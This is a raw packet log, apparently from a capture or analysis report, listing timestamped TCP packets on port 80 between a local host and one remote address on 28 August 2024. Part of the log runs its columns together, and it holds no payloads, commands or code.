Aug 28, 2024 14:02:01.508567095 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.508579969 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.508622885 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.509285927 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.509387016 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.509398937 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.509411097 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.509423018 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.509423971 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.509435892 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.509448051 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.509478092 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.510211945 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.510257959 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.510268927 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.510298014 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.510665894 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.510687113 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.510715008 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.510715961 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.510771036 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.628484964 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.628499985 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.628510952 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.628570080 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.628598928 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.628617048 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.628628969 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.628645897 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.628645897 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.628659964 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.628673077 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.628673077 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.628705978 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.629245996 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.629257917 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.629268885 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.629309893 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.629338026 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.629520893 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.629540920 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.629554987 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.629566908 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.629578114 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.629586935 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.629617929 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.629981995 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.629993916 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.630006075 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.630018950 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.630028963 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.630032063 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.630060911 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.630091906 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.630091906 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.630105972 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.630117893 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.630132914 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.630150080 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.630188942 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.630955935 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.630975008 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.630989075 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.631001949 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.631014109 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.631026983 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.631053925 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.749638081 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.749671936 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.749696970 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.749708891 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.749720097 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.749733925 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.749773979 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.749773979 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.749866962 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.749880075 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.749891996 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.749906063 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.749938011 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.749953032 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.749963999 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.749975920 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750021935 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.750368118 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750387907 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750400066 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750432968 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.750502110 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750514030 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750539064 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.750641108 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750668049 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750679970 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750683069 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.750719070 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.750727892 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750740051 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750751019 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750762939 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750788927 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.750801086 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.750834942 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750845909 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750855923 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750866890 CEST    80    49742    193.25.216.165    192.168.2.4
Aug 28, 2024 14:02:01.750883102 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.750910044 CEST    49742    80    192.168.2.4    193.25.216.165
Aug 28, 2024 14:02:01.751559019 CEST    80    49742    193.25.216.165    192.168.2.4
                                                            Aug 28, 2024 14:02:01.751599073 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.751610041 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.751622915 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.751650095 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.751667023 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.751681089 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.751693010 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.751718044 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.751729012 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.870465040 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870481014 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870491982 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870511055 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870523930 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870553970 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.870572090 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870579004 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.870587111 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870599985 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870639086 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.870649099 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870660067 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870672941 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870683908 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870690107 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.870723963 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.870769024 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.871290922 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871303082 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871313095 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871339083 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.871364117 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871377945 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871388912 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871402979 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.871433973 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.871711969 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871723890 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871736050 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871762991 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.871808052 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871845007 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.871927023 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871937990 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871948957 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871959925 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871972084 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871987104 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.871987104 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.872000933 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872001886 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.872041941 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.872613907 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872625113 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872637987 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872663975 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.872678995 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.872715950 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872728109 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872739077 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872749090 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872760057 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872772932 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.872785091 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.872797012 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872807980 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872818947 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872833014 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.872840881 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.872868061 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.873531103 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.877418041 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.962748051 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.991477966 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.991488934 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.991559982 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.991566896 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.991602898 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.991630077 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.991683006 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.991720915 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.991758108 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.991823912 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.991858006 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.991894007 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992024899 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992034912 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992073059 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.992104053 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992117882 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992130041 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992139101 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.992142916 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992175102 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.992292881 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992330074 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992340088 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992367983 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992368937 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.992381096 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992397070 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.992413044 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.992458105 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992468119 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992477894 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992494106 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992496014 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.992506981 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.992543936 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.993128061 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.993139029 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.993149996 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.993161917 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.993170977 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.993180990 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.993191004 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.993206024 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.993232012 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.993240118 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.993249893 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.993261099 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.993278980 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.993292093 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.993309021 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.993321896 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.993331909 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.993350029 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.994065046 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.994107008 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.994117975 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.994147062 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.994162083 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.994179010 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.994189978 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.994200945 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.994210958 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.994235992 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.994247913 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.994266033 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.994277000 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.994288921 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.994301081 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.994319916 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:01.994326115 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:01.994338036 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.055083036 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.057189941 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.112757921 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.112775087 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.112787962 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.112802029 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.112823963 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.112864017 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.112941980 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.112961054 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113018036 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113055944 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.113085985 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113104105 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113130093 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.113140106 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113152027 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113164902 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113188028 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.113190889 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113204956 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113214016 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.113218069 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113230944 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113239050 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.113270044 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.113890886 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113903999 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113914967 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113933086 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113939047 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.113945961 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113957882 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113974094 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113985062 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113996983 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.113996983 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.113996983 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.114023924 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.114090919 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.114104033 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.114115953 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.114142895 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.114172935 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.114768982 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.114813089 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.114824057 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.114852905 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.114883900 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.114896059 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.114906073 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.114919901 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.114923000 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.114939928 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.115003109 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.115015984 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.115027905 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.115040064 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.115050077 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.115075111 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.115098000 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.115109921 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.115768909 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.115782022 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.115792990 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.115835905 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.115848064 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.115859032 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.115859985 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.115868092 CEST4974280192.168.2.4193.25.216.165
                                                            Aug 28, 2024 14:02:02.115874052 CEST8049742193.25.216.165192.168.2.4
                                                            Aug 28, 2024 14:02:02.115886927 CEST8049742193.25.216.165192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 14:02:02.115899086 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.115897894 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
Aug 28, 2024 14:02:02.115911961 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.115923882 CEST | 80 | 49742 | 193.25.216.165 | 192.168.2.4
Aug 28, 2024 14:02:02.115926981 CEST | 49742 | 80 | 192.168.2.4 | 193.25.216.165
